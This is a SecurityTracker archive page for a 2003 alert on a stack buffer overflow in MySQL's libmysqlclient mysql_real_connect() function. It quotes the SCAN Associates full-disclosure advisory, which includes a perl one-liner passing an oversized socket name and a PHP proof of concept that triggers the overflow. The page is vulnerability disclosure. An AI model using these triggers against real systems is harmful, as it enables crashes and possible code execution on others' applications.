SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   libmysqlclient Vendors:   MySQL.com
MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006976
SecurityTracker URL:  http://securitytracker.com/id/1006976
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 13 2003
Impact:   Denial of service via network, Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network

Version(s): 4.x and prior versions
Description:   A buffer overflow vulnerability was reported in the MySQL libmysqlclient software. A remote or local user may be able to cause arbitrary code to be executed or cause an application to crash, depending on how the application uses the vulnerable libmysqlclient library

SCAN Associates reported that the mysql_real_connect() function contains a buffer overflow. A UNIX socked name greater than 300 characters can trigger the overflow and potentially execute arbitrary code.

A demonstration exploit example is provided:

mysql -S `perl -e 'print "A" x 350'` -hlocalhost

The extent to which this flaw can be exploited depends on the application that uses the affected function call. In some applications, a remote or local user may be able to cause the application to execute arbitrary code.

The vendor has reportedly been notified (on June 1, 2003).

Impact:   The impact depends on the application that uses the vulnerable function call. In some implementations, it may be possible for a remote or local user to execute arbitrary code on the target application.
Solution:   No solution was available at the time of this entry. The vendor reportedly plans to issue a fix soon.
Vendor URL:  www.mysql.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] libmysqlclient 4.x and below mysql_real_connect() buffer overflow.


SCAN Associates Sdn Bhd Security Advisory

Products: libmysqlclient 4.x and below (http://www.mysql.com)
Date: 12 June 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net 
	shaharil_at_scan-associates.net 
	munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.

Description
===========
libmysqlclient is  client library to communicate with mysql server.   

Details
=======
There is stack buffer overflow in mysql_real_connect() function with 
long unix socket name (over 300 character).

ex:
	mysql -S `perl -e 'print "A" x 350'` -hlocalhost

proof of concept
----------------
This bug have succesfully test on safe_mode php in our latest geeklog bug
http://www.scan-associates.net/papers/geeklog.txt where user can upload 
*.php file.

<?php
    for ($i;$i<350;$i++)
    	$buff .= "A";
    ini_set("mysql.default_socket","$buff");
    mysql_connect("localhost", "blabla", "blabla");
?>

Vendor Response 
=============== 
Vendor has been contacted on 06/01/2003 and fix will available soon.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC